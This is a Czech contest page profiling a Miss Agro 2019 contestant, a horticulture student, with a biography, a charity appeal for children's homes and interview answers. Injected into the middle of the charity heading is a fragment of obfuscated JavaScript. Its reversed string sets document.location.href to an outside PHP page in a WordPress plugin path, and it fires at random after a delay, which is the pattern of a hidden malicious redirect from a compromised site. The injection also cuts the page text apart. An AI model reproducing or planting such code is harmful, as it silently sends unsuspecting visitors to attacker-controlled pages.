Klára Vlášková

Profil

Fakulta: FAPPZ
Obor: Zahradní a krajinářské úpravy (ABZU)
Ročník: 3.
Věk:
23

Klárka, která nemá ráda, když jí někdo říká Kláro, se na první pohled zdá jako nevinná slečna. Ale znáte to, tichá voda břehy mele. Když ji poznáte blíž, ujistí vás, že je to tedy pěkné kvítko. Má ráda upřímnost a s ničím se nepáře, každému narovinu řekne, co si o něm myslí, a to očekává i od ostatních. Jinak je hodná a přátelská holka. Miluje dobré jídlo, ale když na to dojde a je líná uvařit, tak nepohrdne ani čínskou polívkou z pytlíku. Její největší zálibou je cestování a jednou by ráda procestovala celý svět. V životě nejvíc lituje ukončení kariéry ve sjezdovém lyžování, která trvala 12 let, ale nebýt toho, nebyla by třeba teď tam, kde je.

“Podporujeme

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}domovů“ css=“.vc_custom_1492523222849{margin-top: 30px !important;}“]Miss Agro podporuje mladé studenty z dětských domovů prostřednictvím Nadačního fondu Veroniky Kašákové. Podpořte je i Vy! Přispět můžete libovolnou částkou na účet 2113124252/2700. Více informací najdete na webových stránkách www.nfvk.cz. Děkujeme, že pomáháte!

Proč by ses zrovna Ty měla stát Miss Agro 2019?

Jsem praštěná a energická. Pro mě není nejdůležitější vyhrát, ale zúčastnit se. Výhra by byla už jen třešničkou na dortu. A ta velká korunka pro Miss Agro je fakt krásná a na mé malé hlavě by určitě vynikla! (smích)

Máš nějaký životní vzor? Čím Tě inspiruje?

Mým největším vzorem jsou moji rodiče. Ob měsíc jsou od sebe vzdáleni více než 6 500 km, a i přes to se tak moc milují a drží stále spolu. To, co spolu vybudovali je neskutečné a obdivuhodné.

Na který předmět na ČZU vzpomínáš nejvíce a proč?

Nejvíce vzpomínám na GIS (geografické informační systémy). Na tomto předmětu jsem poznala svého, snad už životního partnera i přes to, že každý studujeme na jiné fakultě a v jiném ročníku.

Na co se v soutěži Miss Agro těšíš nejvíc?

Těším se na to, že poznám nové lidi, vytvořím přátelství a maximálně si užiju atmosféru se všemi, kteří mě přijdou podpořit na finále. Také se těším na to, až budu mít na sobě ty překrásné šaty a budu se v nich cítit jako princezna a snad překonám i tu mojí trému.